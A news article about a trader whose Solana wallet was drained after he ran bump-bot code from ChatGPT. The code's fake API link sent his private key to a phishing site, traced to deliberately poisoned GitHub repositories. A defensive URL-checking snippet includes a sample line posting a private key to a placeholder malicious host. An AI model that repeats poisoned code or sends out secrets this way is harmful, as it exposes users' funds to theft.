A user building a bump bot with ChatGPT had his main wallet drained this Thursday after deploying the code the AI engine gave him.

Soon after the attack, the trader took to X to ask blockchain investigators for help finding evidence.



The investigators discovered that the hacker, or hackers, spent months building “poisoned” bot repositories on GitHub for Solana meme-coin trading platforms Pump.fun and Moonshot, which OpenAI’s engine then used as its data source.

How Did The Attack Happen?

The meme-coin trader, who goes by the handle r_ocky0 on X, asked ChatGPT for help writing a bump bot for Pump.fun.



At some point, the interaction required the user to write his private key into the requested code. He did so despite AI engines advising against the practice, which can expose the key in network traffic and in server logs.

The code provided by ChatGPT included a fake link to Solana’s API, which sent the user’s private key directly to a phishing website. Within 30 minutes of making his first request to the bot, all his funds had been drained.
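One way to catch this kind of redirect before running generated code is to list every URL it contacts and compare the hosts against endpoints you have verified yourself. The following is a minimal sketch, not a complete defense: the allowlist holds Solana's public RPC hosts, while `find_untrusted_urls`, the `generated` snippet, and the `api.fake-solana.example` host are hypothetical names invented for illustration and are not taken from the incident.

```python
import re
from urllib.parse import urlparse

# Solana's public RPC hosts; extend only with providers you have verified.
TRUSTED_HOSTS = {
    "api.mainnet-beta.solana.com",
    "api.devnet.solana.com",
    "api.testnet.solana.com",
}

# Matches http(s) URLs up to the next quote, bracket, or whitespace.
URL_PATTERN = re.compile(r"https?://[^\s\"'<>)]+")


def find_untrusted_urls(source_code: str) -> list[str]:
    """Return every URL in source_code whose host is not in TRUSTED_HOSTS."""
    untrusted = []
    for url in URL_PATTERN.findall(source_code):
        host = urlparse(url).hostname or ""
        if host.lower() not in TRUSTED_HOSTS:
            untrusted.append(url)
    return untrusted


# Hypothetical snippet standing in for AI-generated bot code (assumption).
generated = '''
RPC = "https://api.mainnet-beta.solana.com"
requests.post("https://api.fake-solana.example/pumpfun/buy", json={"private_key": key})
'''

for url in find_untrusted_urls(generated):
    print("Review before running:", url)
```

A scan like this only surfaces URLs written out in plain text. It would miss a host that is built at runtime or hidden inside a dependency, so it complements reading the code rather than replacing it.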

“I had a feeling that I was doing something wrong, but the trust in OpenAI lost me,” he lamented.

How Was The AI Poisoned?

Scam Sniffer, a Web3 hacks investigation project, found that over the last four months, a user named “solanaapisdev” has created “numerous repositories” to manipulate AI into generating malicious code.

According to research conducted by the founder of blockchain security firm SlowMist, who goes by the pseudonym Evilcos, these repositories contained not just one but several poisoning practices: “Not only do they upload private keys, they also help users generate private keys online for them to use.” The scammed user had directly requested Evilcos’s help in his X post detailing the situation.

He also found that the first four reference sources ChatGPT pulled to build the bot the user requested were poisoned.

Evilcos warned: “When playing with LLMs such as GPT/Claude, you must be careful that these LLMs have widespread deception.”

“More serious than one incident”

The wallet to which the funds were drained has been very active since the hack and was already active before it.

The user whose wallet was drained said, “The problem is not a lack of knowledge, but we started to believe that AI can solve our problems.”

While this scam happened through ChatGPT, there is no evidence that scammers purposely aimed to poison the world’s leading AI engine.

As one technologist pointed out on X, they were “just” trying to mislead users who wanted to run the bot.

With meme-coins trading at an all-time high, users are frantically looking for or trying to create the next big thing.

Platforms like Pump.fun and Moonshot are accessible to everyone, yet profiting from them is a matter of either luck or deploying complex trading strategies that require several platforms, automation, bots, and other tools.

Because not all traders take the time to analyze and verify their actions, there is a real danger that incidents like this will become more frequent.